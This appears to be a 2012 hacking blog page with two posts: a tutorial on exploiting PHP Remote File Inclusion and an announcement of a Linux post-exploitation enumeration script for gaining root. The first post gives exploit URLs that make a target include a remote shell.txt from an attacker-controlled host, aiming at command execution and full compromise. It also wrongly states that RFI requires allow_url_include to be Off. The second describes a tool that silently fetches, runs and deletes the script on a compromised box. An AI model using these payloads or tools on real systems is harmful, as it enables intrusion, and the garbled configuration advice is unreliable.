Tuesday, May 15, 2012

Remote File Include (RFI) Exploitation

Remote File Includes (a.k.a. RFI) work in the same way Local Fiel Includes (LFI) work with the main difference being instead of including local pages we will actually try to include remote pages from a different site and domain. The flaw is the same as LFI vulns but requires not only allow_url_fopen to be ON but also requires allow_url_include to be OFF.

LFI: allow_url_fopen = On
RFI: allow_url_include = Off

When these conditions are right we can perform a Remote File Inclusion with disastewrous affects on the target site, just as you have seen in past with LFI. We can include PHP code from remote site and use it to perform command execution on the target site and ultimately leverage it to perform a full system comprimise.

RFI technique can be used with straight inclusions:
  <?php
  $page = $_GET['page'];
  include($page);
  ?>

As well as with NULL byte inclusions where we need to kill a appended file extension or similar:
  <?php
  $page = $_GET['page'];
  include($page . ".php");
  ?>
Now in order to properly get our code injected or included we need to keep it stored on a site we contorl and we need to keep it in text format as opposed to standard PHP file format (i.e. shell.txt instead of shell.php). We replace the vuln link in our target site with a reference to a our remote controled site (http://controlled.com/shell.txt). I should note that we add a "?" to the end of our request link which will tell the target vuln server to interpret what follows as executable code. Our final exploit request link looks like this:

Straight Include:
http://target.com/vuln.php?page=http://controlled.com/shell.txt?

OR to kill appendage you might try NULL byte:
http://target.com/vuln.php?page=http://controlled.com/shell.txt?;
http://target.com/vuln.php?page=http://controlled.com/shell.txt?

Depending on which technique you use you should find (if vuln) that your remote code is now being included on the target page. The above code examples would now be returning the "$page" variable as so:

Straight Include: include('http://controlled.com/shell.txt');
OR
NULL Byte Include: include('http://controlled.com/shell.txt?/.php');

This results in our code now being included placing our remote code actively on the immediate page. If you can't execute code you wont be able to do much other than including Google which is still vuln but you need to include a full featured shell or place custom code on your remote controlled host to comprimise things and make permanent impact on the target server.

Here is a brief video I made to demonstrate how things should work for you if you come across this in one of your audits:

video

Hope you enjoyed the show....

Until next time, Enjoy!

The Inf0rm3r - Linux Enumeration Script

Hey Guys,

I am back and apologize for lack of activity last month, life has been crazy lately. As some of you may or may not know I been trying to step up my post exploitation skills as well as my general Linux skills. I recently jumped to Linux OS for my main day-to-day OS and have to say I've never been happier (other than Camtasia doesn't run on Linux). Anyway, I started looking into common tasks one should perform post shell access in order to increase ones chances of gaining root access and decided to try and write my first Linux script to try and help myself and since I <3 my supporters I decided to share with you guys as well. Now everyone can download and run a exploit and cross fingers and hope it works but what if it doesn't? What if we want to still try and root the box? There are many methods one can use to still gain root access without pre-compiled exploits. I will link you to a great reference guide for some basic methods one can use to go about searching for ways to gain root access and then I will give you my new script I wrote which will try to take some of the pain out of the process for you by quickly identifying some key areas one can start looking at to get things done and/or digg out a bit more info. The tool for now only does pure enumeration but I do have a few ideas for a private version which will continue development on into the future, who knows though. That being said I give you the following which I have available now:

A really good newbie guide to actual rooting methods with some understandable examples:
http://www.dankalia.com/tutor/01005/0100501004.htm

There are many other write ups out there if you search hard and do some reading. This is just a tool give-away, not a how to root the box thread. I will try to continue posting more post exploit techniques as time allows in the near future...

To the Point - Downloads:
Inform3r.zip, contains the following:
Inf0rm3r.sh:
  •     Actual bash script which does the enumeration magic and can be run one its own
fetch3r:
  •     side project from Inf0rme3r, C based App which remotely grabs Inf0rm3r script,  runs it, and deletes it so all that is left is the report file. Also no output in terminal so can be easier on some systems (CentOS for example which have buffer size issues due to it being set at compiling time)
SCRIPT SOURCE: https://pastee.org/b4gtz
  • PASS: I<3INTRA!
I also made a brief DEMO VIDEO to highlight it in action so you get an idea for what all it captures, have a look see:




NOTE: There is function already created to handle emailing of the report file if you're running the standalone script. You just need to uncomment the code in the script and then pass a email to the script when run as an argument. It requires /bin/mail from mailutils to be installed to work. I didn't get this properly installed and set-up locally so my testing only validated the logic, not the actual emailing itself, although I had a buddy state it was working for him so its up in the air for now (hence it being commented out for this release version, we will see what future brings).

Big Shout-out and special thanks to Phaedrus for helping me out with a few live test environments to fine tune a few things and th3breacher for some of the email code, suggestions and feedback!

...and of course, Greetz to and from everyone in INTRA!

If you have any questions, suggestions or feedback of any kind do let me know as I want to improve this over time to really be something unique and handy for the community to have.

Until next time, Enjoy the pursuit for r00t!